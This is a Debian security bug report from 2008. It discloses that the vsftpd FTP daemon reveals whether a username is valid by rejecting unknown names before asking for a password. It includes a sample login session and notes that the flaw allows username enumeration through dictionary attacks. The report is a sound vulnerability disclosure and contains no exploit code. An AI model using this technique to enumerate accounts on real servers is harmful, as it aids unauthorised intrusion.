Mark Hobley
2008-Dec-21 12:16 UTC
[Secure-testing-team] Bug#509333: vsftpd discloses whether usernames are valid or not
Package: vsftpd Severity: grave Tags: security Justification: user security hole The vsftpd daemon discloses whether usernames supplied by the client are valid or not. On connection to the server via a client, if an invalid username is supplied, a 530 error is immediately returned, instead of a password prompt being returned before failure. Here is a sample session: ftp despina Connected to despina.markhobley.yi.org 220 Welcome to vsftpd server daemon Name (despina:mark): shaggy 530 Permission denied. <--- We should prompt for password Login failed. before failing here. By prompting for a password, the user would not know whether the username or the password is invalid. Without the password prompt, the user knows that the username is not valid, and can quickly perform a dictionary attack to obtain system usernames. This vulnerability was first discovered in September 2003, and has not yet been patched. http://securitytracker.com/id?1008628 Testing in December 2008 confirms that the bug is not fixed. Mark. -- System Information: Debian Release: 5.0 APT prefers unstable APT policy: (500, ''unstable''), (500, ''testing'') Architecture: i386 (i686) Kernel: Linux 2.6.26-1-486 Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/dash Versions of packages vsftpd depends on: ii adduser 3.110 add and remove users and groups ii libc6 2.7-16 GNU C Library: Shared libraries ii libcap1 1:1.10-14 support for getting/setting POSIX. ii libpam-modules 1.0.1-4 Pluggable Authentication Modules f ii libpam0g 1.0.1-4 Pluggable Authentication Modules l ii libssl0.9.8 0.9.8g-14 SSL shared libraries ii libwrap0 7.6.q-16 Wietse Venema''s TCP wrappers libra ii netbase 4.34 Basic TCP/IP networking system Versions of packages vsftpd recommends: ii logrotate 3.7.7-2 Log rotation utility vsftpd suggests no packages.